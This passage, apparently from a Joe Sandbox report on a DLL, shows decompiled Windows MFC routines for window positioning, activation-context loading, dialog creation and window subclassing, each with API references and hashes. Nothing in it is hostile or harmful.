						if(_t104 != 0) {
							_t121 = _t104;
						}
					}
				} else {
					_t4 = _t58 + 0x20; // 0xc033d88b
					_t121 =  *_t4;
				}
				_push(_t105);
				GetWindowRect( *(_t125 + 0x20),  &_v60);
				if((_v8 & 0x40000000) != 0) {
					_t107 = GetParent( *(_t125 + 0x20));
					GetClientRect(_t107,  &_v28);
					GetClientRect(_t121,  &_v44);
					MapWindowPoints(_t121, _t107,  &_v44, 2);
				} else {
					if(_t121 != 0) {
						_t103 = GetWindowLongA(_t121, 0xfffffff0);
						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
							_t121 = 0;
						}
					}
					_v100 = 0x28;
					if(_t121 != 0) {
						GetWindowRect(_t121,  &_v44);
						E10008551(_t121, E100084E6(_t121, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t94 = E10005CAE();
						if(_t94 != 0) {
							_t94 =  *((intOrPtr*)(_t94 + 0x20));
						}
						E10008551(_t121, E100084E6(_t94, 1),  &_v100);
						CopyRect( &_v44,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t108 = _v60.left;
				asm("cdq");
				_t123 = _v60.right - _t108;
				asm("cdq");
				_t120 = _v44.bottom;
				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
				_a4 = _v60.bottom - _v60.top;
				asm("cdq");
				asm("cdq");
				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
				if(_t116 >= _v28.left) {
					if(_t123 + _t116 > _v28.right) {
						_t116 = _t108 - _v60.right + _v28.right;
					}
				} else {
					_t116 = _v28.left;
				}
				if(_t129 >= _v28.top) {
					if(_a4 + _t129 > _v28.bottom) {
						_t129 = _v60.top - _v60.bottom + _v28.bottom;
					}
				} else {
					_t129 = _v28.top;
				}
				return E1000F1A1(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
			}

0x1000a2c4
0x1000a2c4
0x1000a2cb
0x1000a2ce
0x1000a2d6
0x1000a2d9
0x1000a2de
0x1000a2ec
0x1000a2fe
0x1000a2ee
0x1000a2f1
0x1000a2f1
0x1000a304
0x1000a308
0x1000a314
0x1000a31c
0x1000a31e
0x1000a31e
0x1000a31c
0x1000a2e0
0x1000a2e0
0x1000a2e0
0x1000a2e0
0x1000a320
0x1000a32e
0x1000a337
0x1000a3d7
0x1000a3de
0x1000a3e5
0x1000a3ef
0x1000a33d
0x1000a33f
0x1000a344
0x1000a34f
0x1000a358
0x1000a358
0x1000a34f
0x1000a35c
0x1000a363
0x1000a3a4
0x1000a3b3
0x1000a3c0
0x1000a365
0x1000a365
0x1000a36c
0x1000a36e
0x1000a36e
0x1000a37e
0x1000a391
0x1000a39b
0x1000a39b
0x1000a363
0x1000a3fe
0x1000a403
0x1000a408
0x1000a40c
0x1000a40f
0x1000a416
0x1000a41e
0x1000a426
0x1000a42e
0x1000a435
0x1000a43a
0x1000a446
0x1000a44e
0x1000a44e
0x1000a43c
0x1000a43c
0x1000a43c
0x1000a454
0x1000a463
0x1000a46b
0x1000a46b
0x1000a456
0x1000a456
0x1000a456
0x1000a483

APIs

Part of subcall function 1000EEC4: GetWindowLongA.USER32 ref: 1000EECF

GetParent.USER32(?), ref: 1000A2F1
SendMessageA.USER32 ref: 1000A314
GetWindowRect.USER32 ref: 1000A32E
GetWindowLongA.USER32 ref: 1000A344
CopyRect.USER32 ref: 1000A391
CopyRect.USER32 ref: 1000A39B
GetWindowRect.USER32 ref: 1000A3A4
CopyRect.USER32 ref: 1000A3C0

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Rect$Window$Copy$Long$MessageParentSend
String ID:
API String ID: 808654186-0
Opcode ID: 9ff1ffca443c0671e985d08d4d0a79713c159cacf4ec812370c5e182881e21c9
Instruction ID: 63e85339992314f50ad76cd4fa936f515b0dc0fc70569d21828395b99dd1d8a3
Opcode Fuzzy Hash: 9ff1ffca443c0671e985d08d4d0a79713c159cacf4ec812370c5e182881e21c9
Instruction Fuzzy Hash: 2C513F76D00619AFEB01CBA8CC85EEEBBB9EB49390F154214F905B7195D730EE858B60

Uniqueness

Uniqueness Score: -1.00%

Function 100056D9 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 56
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100056D9(intOrPtr* __ecx, void* __esi, intOrPtr _a4) {
				void* __ebx;
				void* __edi;
				void* __ebp;
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t15;
				void* _t16;
				intOrPtr* _t18;
				char _t19;
				intOrPtr _t21;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t23;

				_t16 = __esi;
				_t12 = __ecx;
				_t18 = __ecx;
				 *__ecx = _a4;
				_a4 = 0;
				_t19 =  *0x10046ad4; // 0x0
				if(_t19 == 0) {
					_t15 = GetModuleHandleA("KERNEL32");
					_t20 = _t15;
					if(_t15 == 0) {
						L2:
						E10004E6E(0, _t12, _t15, _t16, _t20);
					}
					 *0x10046ac4 = GetProcAddress(_t15, "CreateActCtxA");
					 *0x10046ac8 = GetProcAddress(_t15, "ReleaseActCtx");
					 *0x10046acc = GetProcAddress(_t15, "ActivateActCtx");
					_t9 = GetProcAddress(_t15, "DeactivateActCtx");
					_t21 =  *0x10046ac4; // 0x0
					 *0x10046ad0 = _t9;
					_t16 = _t16;
					if(_t21 == 0) {
						__eflags =  *0x10046ac8; // 0x0
						if(__eflags != 0) {
							goto L2;
						} else {
							__eflags =  *0x10046acc; // 0x0
							if(__eflags != 0) {
								goto L2;
							} else {
								__eflags = _t9;
								if(__eflags != 0) {
									goto L2;
								}
							}
						}
					} else {
						_t22 =  *0x10046ac8; // 0x0
						if(_t22 == 0) {
							goto L2;
						} else {
							_t23 =  *0x10046acc; // 0x0
							if(_t23 == 0) {
								goto L2;
							} else {
								_t20 = _t9;
								if(_t9 == 0) {
									goto L2;
								}
							}
						}
					}
					 *0x10046ad4 = 1;
				}
				return _t18;
			}

0x100056d9
0x100056d9
0x100056df
0x100056e3
0x100056e6
0x100056e9
0x100056f0
0x10005701
0x10005703
0x10005705
0x10005707
0x10005707
0x10005707
0x10005721
0x1000572e
0x1000573b
0x10005740
0x10005742
0x10005748
0x1000574d
0x1000574e
0x10005766
0x1000576c
0x00000000
0x1000576e
0x1000576e
0x10005774
0x00000000
0x10005776
0x10005776
0x10005778
0x00000000
0x00000000
0x10005778
0x10005774
0x10005750
0x10005750
0x10005756
0x00000000
0x10005758
0x10005758
0x1000575e
0x00000000
0x10005760
0x10005760
0x10005762
0x00000000
0x10005764
0x10005762
0x1000575e
0x10005756
0x1000577a
0x1000577a
0x10005786

APIs

GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,10006175,000000FF), ref: 100056FB
GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 10005719
GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 10005726
GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 10005733
GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 10005740

Strings

ReleaseActCtx, xrefs: 1000571B
KERNEL32, xrefs: 100056F6
ActivateActCtx, xrefs: 10005728
DeactivateActCtx, xrefs: 10005735
CreateActCtxA, xrefs: 10005713

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
API String ID: 667068680-3617302793
Opcode ID: 399c8412fe992e4a50a3ddfc252fd3a3d78dcfedf62abfe816ac053d2fec79fd
Instruction ID: 1d76d1e4db1a962794084fd329e7408aae32bd70e769f2b2ddda66e1b27d4fc6
Opcode Fuzzy Hash: 399c8412fe992e4a50a3ddfc252fd3a3d78dcfedf62abfe816ac053d2fec79fd
Instruction Fuzzy Hash: B51188B5809666DEF701EF65DEC040B7AE4E70A682705902FE108E2564E73218589F0B

Uniqueness

Uniqueness Score: -1.00%

Function 100080BA Relevance: 16.6, APIs: 11, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E100080BA(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t54;
				void* _t58;
				signed int _t59;
				signed int _t63;
				signed short _t71;
				signed int _t84;
				void* _t94;
				struct HINSTANCE__* _t96;
				signed int _t97;
				void* _t98;
				signed int _t100;
				void* _t101;
				void* _t102;

				_t102 = __eflags;
				_t94 = __edx;
				_push(0x24);
				E1001FBF7(E10033165, __ebx, __edi, __esi);
				_t100 = __ecx;
				 *((intOrPtr*)(_t101 - 0x20)) = __ecx;
				 *(_t101 - 0x1c) =  *(__ecx + 0x60);
				 *(_t101 - 0x18) =  *(__ecx + 0x5c);
				_t54 = E1000EC09(__ebx, __edi, __ecx, _t102);
				_t96 =  *(_t54 + 0xc);
				_t84 = 0;
				_t103 =  *(_t100 + 0x58);
				if( *(_t100 + 0x58) != 0) {
					_t96 =  *(E1000EC09(0, _t96, _t100, _t103) + 0xc);
					_t54 = LoadResource(_t96, FindResourceA(_t96,  *(_t100 + 0x58), 5));
					 *(_t101 - 0x18) = _t54;
				}
				if( *(_t101 - 0x18) != _t84) {
					_t54 = LockResource( *(_t101 - 0x18));
					 *(_t101 - 0x1c) = _t54;
				}
				if( *(_t101 - 0x1c) != _t84) {
					_t86 = _t100;
					 *(_t101 - 0x14) = E10007BF2(_t84, _t100, __eflags);
					E1000A998(_t84, _t96, __eflags);
					 *(_t101 - 0x28) =  *(_t101 - 0x28) & _t84;
					__eflags =  *(_t101 - 0x14) - _t84;
					 *(_t101 - 0x2c) = _t84;
					 *(_t101 - 0x24) = _t84;
					if(__eflags != 0) {
						__eflags =  *(_t101 - 0x14) - GetDesktopWindow();
						if(__eflags != 0) {
							__eflags = IsWindowEnabled( *(_t101 - 0x14));
							if(__eflags != 0) {
								EnableWindow( *(_t101 - 0x14), 0);
								 *(_t101 - 0x2c) = 1;
								_t84 = E10005CAE();
								__eflags = _t84;
								 *(_t101 - 0x24) = _t84;
								if(__eflags != 0) {
									_t86 = _t84;
									__eflags =  *((intOrPtr*)( *_t84 + 0x120))();
									if(__eflags != 0) {
										_t86 = _t84;
										__eflags = E1000EFB3(_t84);
										if(__eflags != 0) {
											_t86 = _t84;
											E1000EFCE(_t84, 0);
											 *(_t101 - 0x28) = 1;
										}
									}
								}
							}
						}
					}
					 *(_t101 - 4) =  *(_t101 - 4) & 0x00000000;
					E1000C3CA(_t96, __eflags, _t100);
					_t58 = E1000A8F0(_t84, _t86, _t101,  *(_t101 - 0x14));
					_push(_t96);
					_push(_t58);
					_push( *(_t101 - 0x1c));
					_t59 = E10007ECA(_t84, _t100, _t94, _t96, _t100, __eflags);
					_t97 = 0;
					__eflags = _t59;
					if(_t59 != 0) {
						__eflags =  *(_t100 + 0x3c) & 0x00000010;
						if(( *(_t100 + 0x3c) & 0x00000010) != 0) {
							_t98 = 4;
							_t71 = E1000EEC4(_t100);
							__eflags = _t71 & 0x00000100;
							if((_t71 & 0x00000100) != 0) {
								_t98 = 5;
							}
							E1000A486(_t100, _t98);
							_t97 = 0;
							__eflags = 0;
						}
						__eflags =  *((intOrPtr*)(_t100 + 0x20)) - _t97;
						if( *((intOrPtr*)(_t100 + 0x20)) != _t97) {
							E1000F1A1(_t100, _t97, _t97, _t97, _t97, _t97, 0x97);
						}
					}
					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
					__eflags =  *(_t101 - 0x28) - _t97;
					if( *(_t101 - 0x28) != _t97) {
						E1000EFCE(_t84, 1);
					}
					__eflags =  *(_t101 - 0x2c) - _t97;
					if( *(_t101 - 0x2c) != _t97) {
						EnableWindow( *(_t101 - 0x14), 1);
					}
					__eflags =  *(_t101 - 0x14) - _t97;
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *((intOrPtr*)(_t100 + 0x20));
						if(__eflags == 0) {
							SetActiveWindow( *(_t101 - 0x14));
						}
					}
					 *((intOrPtr*)( *_t100 + 0x60))();
					E10007C2C(_t84, _t100, _t97, _t100, __eflags);
					__eflags =  *(_t100 + 0x58) - _t97;
					if( *(_t100 + 0x58) != _t97) {
						FreeResource( *(_t101 - 0x18));
					}
					_t63 =  *(_t100 + 0x44);
					goto L31;
				} else {
					_t63 = _t54 | 0xffffffff;
					L31:
					return E1001FC9C(_t63);
				}
			}

0x100080ba
0x100080ba
0x100080ba
0x100080c1
0x100080c6
0x100080c8
0x100080ce
0x100080d4
0x100080d7
0x100080dc
0x100080df
0x100080e1
0x100080e4
0x100080eb
0x100080fc
0x10008102
0x10008102
0x10008108
0x1000810d
0x10008113
0x10008113
0x10008119
0x10008123
0x1000812a
0x1000812d
0x10008132
0x10008135
0x10008138
0x1000813b
0x1000813e
0x10008146
0x10008149
0x10008154
0x10008156
0x1000815d
0x10008163
0x1000816f
0x10008171
0x10008173
0x10008176
0x1000817a
0x10008182
0x10008184
0x10008186
0x1000818d
0x1000818f
0x10008193
0x10008195
0x1000819a
0x1000819a
0x1000818f
0x10008184
0x10008176
0x10008156
0x10008149
0x100081a1
0x100081a6
0x100081ae
0x100081b3
0x100081b4
0x100081b5
0x100081ba
0x100081bf
0x100081c1
0x100081c3
0x100081c5
0x100081c9
0x100081cd
0x100081d0
0x100081d5
0x100081d9
0x100081dd
0x100081dd
0x100081e1
0x100081e6
0x100081e6
0x100081e6
0x100081e8
0x100081eb
0x100081f9
0x100081f9
0x100081eb
0x100081fe
0x10008221
0x10008224
0x1000822a
0x1000822a
0x1000822f
0x10008232
0x10008239
0x10008239
0x1000823f
0x10008242
0x1000824a
0x1000824d
0x10008252
0x10008252
0x1000824d
0x1000825c
0x10008261
0x10008266
0x10008269
0x1000826e
0x1000826e
0x10008274
0x00000000
0x1000811b
0x1000811b
0x10008277
0x1000827c
0x1000827c

APIs

__EH_prolog3_catch.LIBCMT ref: 100080C1
FindResourceA.KERNEL32(?,?,00000005), ref: 100080F4
LoadResource.KERNEL32(?,00000000), ref: 100080FC
LockResource.KERNEL32(?,00000024,100011BE,00000000,00000120), ref: 1000810D
GetDesktopWindow.USER32 ref: 10008140
IsWindowEnabled.USER32(?), ref: 1000814E
EnableWindow.USER32(?,00000000), ref: 1000815D

Part of subcall function 1000EFB3: IsWindowEnabled.USER32(?), ref: 1000EFBC

Part of subcall function 1000EFCE: EnableWindow.USER32(?,000000FF), ref: 1000EFDB

EnableWindow.USER32(?,00000001), ref: 10008239
GetActiveWindow.USER32 ref: 10008244
SetActiveWindow.USER32(?,?,00000024,100011BE,00000000,00000120), ref: 10008252
FreeResource.KERNEL32(?,?,00000024,100011BE,00000000,00000120), ref: 1000826E

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
String ID:
API String ID: 1509511306-0
Opcode ID: af41f4a29e55a80224d8f74d86220bf91cb66e9945eb366eb3219191cba3f32d
Instruction ID: 62cfd41f18e3cc2e1163053c16dc1e50d79b68c3982d3d37ae726430dd99fe76
Opcode Fuzzy Hash: af41f4a29e55a80224d8f74d86220bf91cb66e9945eb366eb3219191cba3f32d
Instruction Fuzzy Hash: BD517D34A007459FFB11DFA4CC85AAEBAB5FF48781F204029E582B61A6CB755A42CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1000C033 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E1000C033(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t31;
				void* _t33;
				void* _t34;
				void* _t40;
				void* _t43;
				void* _t60;
				void* _t64;
				struct HWND__* _t66;
				CHAR* _t68;
				void* _t71;

				_t64 = __edx;
				_t60 = __ecx;
				_push(0x40);
				E1001FBF7(E10033663, __ebx, __edi, __esi);
				_t66 =  *(_t71 + 8);
				_t68 = "AfxOldWndProc423";
				_t31 = GetPropA(_t66, _t68);
				 *(_t71 - 0x14) =  *(_t71 - 0x14) & 0x00000000;
				 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
				 *(_t71 - 0x18) = _t31;
				_t58 = 1;
				_t33 =  *(_t71 + 0xc) - 6;
				if(_t33 == 0) {
					_t34 = E1000A8F0(1, _t60, _t71,  *(_t71 + 0x14));
					E1000BF47(_t60, E1000A8F0(1, _t60, _t71, _t66),  *(_t71 + 0x10), _t34);
					goto L9;
				} else {
					_t40 = _t33 - 0x1a;
					if(_t40 == 0) {
						_t58 = 0 | E1000BFBD(1, _t66, E1000A8F0(1, _t60, _t71, _t66),  *(_t71 + 0x14),  *(_t71 + 0x14) >> 0x10) == 0x00000000;
						L9:
						if(_t58 != 0) {
							goto L10;
						}
					} else {
						_t43 = _t40 - 0x62;
						if(_t43 == 0) {
							SetWindowLongA(_t66, 0xfffffffc,  *(_t71 - 0x18));
							RemovePropA(_t66, _t68);
							GlobalDeleteAtom(GlobalFindAtomA(_t68));
							goto L10;
						} else {
							if(_t43 != 0x8e) {
								L10:
								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66,  *(_t71 + 0xc),  *(_t71 + 0x10),  *(_t71 + 0x14));
							} else {
								E1000963A(E1000A8F0(1, _t60, _t71, _t66), _t71 - 0x30, _t71 - 0x1c);
								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66, 0x110,  *(_t71 + 0x10),  *(_t71 + 0x14));
								E1000AEC5(1, _t64, _t49, _t71 - 0x30,  *((intOrPtr*)(_t71 - 0x1c)));
							}
						}
					}
				}
				return E1001FC9C( *(_t71 - 0x14));
			}

0x1000c033
0x1000c033
0x1000c033
0x1000c03a
0x1000c03f
0x1000c042
0x1000c049
0x1000c04f
0x1000c053
0x1000c057
0x1000c05f
0x1000c060
0x1000c063
0x1000c10c
0x1000c11e
0x00000000
0x1000c069
0x1000c069
0x1000c06c
0x1000c104
0x1000c123
0x1000c125
0x00000000
0x00000000
0x1000c06e
0x1000c06e
0x1000c071
0x1000c0ca
0x1000c0d2
0x1000c0e0
0x00000000
0x1000c073
0x1000c078
0x1000c127
0x1000c13a
0x1000c07e
0x1000c08f
0x1000c0ac
0x1000c0b4
0x1000c0b4
0x1000c078
0x1000c071
0x1000c06c
0x1000c0c1

APIs

__EH_prolog3_catch.LIBCMT ref: 1000C03A
GetPropA.USER32 ref: 1000C049
CallWindowProcA.USER32 ref: 1000C0A3

Part of subcall function 1000AEC5: GetWindowRect.USER32 ref: 1000AEED
Part of subcall function 1000AEC5: GetWindow.USER32(?,00000004), ref: 1000AF0A

SetWindowLongA.USER32 ref: 1000C0CA
RemovePropA.USER32 ref: 1000C0D2
GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 1000C0D9
GlobalDeleteAtom.KERNEL32(00000000), ref: 1000C0E0

Part of subcall function 1000963A: GetWindowRect.USER32 ref: 10009646

CallWindowProcA.USER32 ref: 1000C134

Strings

AfxOldWndProc423, xrefs: 1000C042, 1000C047, 1000C0D0, 1000C0D8

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
String ID: AfxOldWndProc423
API String ID: 2702501687-1060338832
Opcode ID: 2b9a5534c446d1e2504235bdd7f96beab8017efbdf1b97bda0119f086f5d1bd4
Instruction ID: dfbf0fdf7da19c16620821b7241651b8befac12ff30b1409a2a82cb4b6d679a3
Opcode Fuzzy Hash: 2b9a5534c446d1e2504235bdd7f96beab8017efbdf1b97bda0119f086f5d1bd4
Instruction Fuzzy Hash: 4F31983680021ABFEB02DFA4CD89DFF7A78EF09391F004124F501A5156DB749A51DB61

Uniqueness

Uniqueness Score: -1.00%

Function 10007ECA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E10007ECA(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t65;
				signed int _t72;
				signed int _t74;
				struct HWND__* _t75;
				signed int _t78;
				signed int _t95;
				intOrPtr* _t103;
				signed int _t110;
				void* _t124;
				signed int _t129;
				DLGTEMPLATE* _t130;
				struct HWND__* _t131;
				void* _t132;

				_t128 = __esi;
				_t124 = __edx;
				_t104 = __ecx;
				_push(0x3c);
				E1001FBF7(E1003314A, __ebx, __edi, __esi);
				_t103 = __ecx;
				 *((intOrPtr*)(_t132 - 0x20)) = __ecx;
				_t136 =  *(_t132 + 0x10);
				if( *(_t132 + 0x10) == 0) {
					 *(_t132 + 0x10) =  *(E1000EC09(__ecx, 0, __esi, _t136) + 0xc);
				}
				_t129 =  *(E1000EC09(_t103, 0, _t128, _t136) + 0x3c);
				 *(_t132 - 0x28) = _t129;
				 *(_t132 - 0x14) = 0;
				 *(_t132 - 4) = 0;
				E1000D1F4(_t103, _t104, 0, _t129, _t136, 0x10);
				E1000D1F4(_t103, _t104, 0, _t129, _t136, 0x7c000);
				if(_t129 == 0) {
					_t130 =  *(_t132 + 8);
					L7:
					__eflags = _t130;
					if(_t130 == 0) {
						L4:
						_t65 = 0;
						L32:
						return E1001FC9C(_t65);
					}
					E1000424F(_t132 - 0x1c, E1001044F());
					 *(_t132 - 4) = 1;
					 *((intOrPtr*)(_t132 - 0x18)) = 0;
					__eflags = E100123E2(__eflags, _t130, _t132 - 0x1c, _t132 - 0x18);
					__eflags =  *0x1004866c; // 0x0
					_t72 = 0 | __eflags == 0x00000000;
					if(__eflags == 0) {
						L14:
						__eflags = _t72;
						if(__eflags == 0) {
							L17:
							 *(_t103 + 0x44) =  *(_t103 + 0x44) | 0xffffffff;
							 *(_t103 + 0x3c) =  *(_t103 + 0x3c) | 0x00000010;
							E1000C3CA(0, __eflags, _t103);
							_t74 =  *(_t132 + 0xc);
							__eflags = _t74;
							if(_t74 != 0) {
								_t75 =  *(_t74 + 0x20);
							} else {
								_t75 = 0;
							}
							_t131 = CreateDialogIndirectParamA( *(_t132 + 0x10), _t130, _t75, E10007926, 0);
							E10001260( *((intOrPtr*)(_t132 - 0x1c)) + 0xfffffff0, _t124);
							 *(_t132 - 4) =  *(_t132 - 4) | 0xffffffff;
							_t110 =  *(_t132 - 0x28);
							__eflags = _t110;
							if(__eflags != 0) {
								 *((intOrPtr*)( *_t110 + 0x18))(_t132 - 0x48);
								__eflags = _t131;
								if(__eflags != 0) {
									 *((intOrPtr*)( *_t103 + 0x12c))(0);
								}
							}
							_t78 = E1000A998(_t103, 0, __eflags);
							__eflags = _t78;
							if(_t78 == 0) {
								 *((intOrPtr*)( *_t103 + 0x114))();
							}
							__eflags = _t131;
							if(_t131 != 0) {
								__eflags =  *(_t103 + 0x3c) & 0x00000010;
								if(( *(_t103 + 0x3c) & 0x00000010) == 0) {
									DestroyWindow(_t131);
									_t131 = 0;
									__eflags = 0;
								}
							}
							__eflags =  *(_t132 - 0x14);
							if( *(_t132 - 0x14) != 0) {
								GlobalUnlock( *(_t132 - 0x14));
								GlobalFree( *(_t132 - 0x14));
							}
							__eflags = _t131;
							_t59 = _t131 != 0;
							__eflags = _t59;
							_t65 = 0 | _t59;
							goto L32;
						}
						L15:
						E100123AB(_t103, _t132 - 0x38, 0, _t132, _t130);
						 *(_t132 - 4) = 2;
						E10012309(_t132 - 0x38,  *((intOrPtr*)(_t132 - 0x18)));
						 *(_t132 - 0x14) = E10012022(_t132 - 0x38);
						 *(_t132 - 4) = 1;
						E10012014(_t132 - 0x38);
						__eflags =  *(_t132 - 0x14);
						if(__eflags != 0) {
							_t130 = GlobalLock( *(_t132 - 0x14));
						}
						goto L17;
					}
					__eflags = _t72;
					if(_t72 != 0) {
						goto L15;
					}
					__eflags = GetSystemMetrics(0x2a);
					if(__eflags == 0) {
						goto L17;
					}
					_t95 = E10007EA2(_t132 - 0x1c, "MS Shell Dlg");
					__eflags = _t95;
					_t72 = 0 | _t95 == 0x00000000;
					__eflags = _t72;
					if(__eflags == 0) {
						goto L17;
					}
					__eflags =  *((short*)(_t132 - 0x18)) - 8;
					if( *((short*)(_t132 - 0x18)) == 8) {
						 *((intOrPtr*)(_t132 - 0x18)) = 0;
					}
					goto L14;
				}
				_push(_t132 - 0x48);
				if( *((intOrPtr*)( *_t103 + 0x12c))() != 0) {
					_t130 =  *((intOrPtr*)( *_t129 + 0x14))(_t132 - 0x48,  *(_t132 + 8));
					goto L7;
				}
				goto L4;
			}

0x10007eca
0x10007eca
0x10007eca
0x10007eca
0x10007ed1
0x10007ed6
0x10007ed8
0x10007edd
0x10007ee0
0x10007eea
0x10007eea
0x10007ef2
0x10007ef7
0x10007efa
0x10007efd
0x10007f00
0x10007f0a
0x10007f11
0x10007f3e
0x10007f41
0x10007f41
0x10007f43
0x10007f25
0x10007f25
0x100080b2
0x100080b7
0x100080b7
0x10007f4e
0x10007f5c
0x10007f60
0x10007f6d
0x10007f72
0x10007f78
0x10007f7a
0x10007fb0
0x10007fb0
0x10007fb2
0x10007ff3
0x10007ff3
0x10007ff7
0x10007ffc
0x10008001
0x10008004
0x10008006
0x1000800c
0x10008008
0x10008008
0x10008008
0x10008026
0x10008028
0x1000802d
0x1000804f
0x10008052
0x10008054
0x1000805c
0x1000805f
0x10008061
0x10008068
0x10008068
0x10008061
0x1000806e
0x10008073
0x10008075
0x1000807b
0x1000807b
0x10008081
0x10008083
0x10008085
0x10008089
0x1000808c
0x10008092
0x10008092
0x10008092
